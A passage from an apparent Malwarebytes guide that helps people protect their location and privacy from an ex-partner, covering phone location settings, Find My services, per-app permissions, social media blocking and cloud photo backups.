    
    *   If you take this step after successfully resetting your password, those devices will be required to use the new password (which only you should know).
    
    *   These settings can often be found in “security” or “privacy and security” tabs in most apps.

**5\. **Review the location settings of your device****

*   Your device provides a way to comprehensively turn off **all** location services that apps rely on to function. With this feature turned off, location-based apps (such as Uber, Uber Eats, Airbnb, Yelp, Maps, etc.) will still function, but you will need to input your address and location manually each time you use the service.
    
    *   You can review location sharing settings on iPhone here.
    
    *   You can review location sharing settings on Android here.

**6\. **Review “Find My/Find My Device” settings****

*   Modern devices come pre-installed with anti-theft services called “Find My” on iPhones and “Find My Device” on Android phones. These are the same services that many couples use to track one another’s location, and turning these services off will shut off access that other people (including exes, friends, and family) have to your location.
    
    *   Alternatively, you can turn off location sharing with one person only rather than turning off location sharing all together. You can review location sharing settings on iPhone here.
    
    *   You can review location sharing settings on Android here.

**7\. **Review the location settings of individual apps****

*   If you want to keep location sharing on for convenience, you can review individual apps on your device and select how you would like your location to be accessed by those apps.
    
    *   iPhones allow you to choose one of several options for how frequently apps will access and use your location: Never, Ask Next Time Or When I Share, While Using the App, or Always. You can review location sharing settings on iPhone here.
    
    *   Android phones allow you to choose one of several options for how frequently apps will access and use your location: Allowed all the time, Allowed only while in use, and Not allowed.
    *   You can review location sharing settings on Android here.

**8\. **Maintain your ongoing security and privacy****

*   If you find it safe and necessary, block your ex on certain social media platforms, messaging apps, etc.
*   Review the privacy settings of social media apps to ensure that your posts are not inadvertently shared with an ex.
    *   Consider whether your ex could see your posts because you have mutual friends who may reveal your posts to your ex.
*   Review automatic cloud backups for photos you take with your smartphone.
    *   If your ex compromises your iCloud or Google Photos account—and your photos are automatically backed up to those accounts—they could retrieve sensitive photos that you want to keep private.
*   When entering a new relationship, have a conversation about consensually and safely sharing your location (or choosing not to).

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Latest News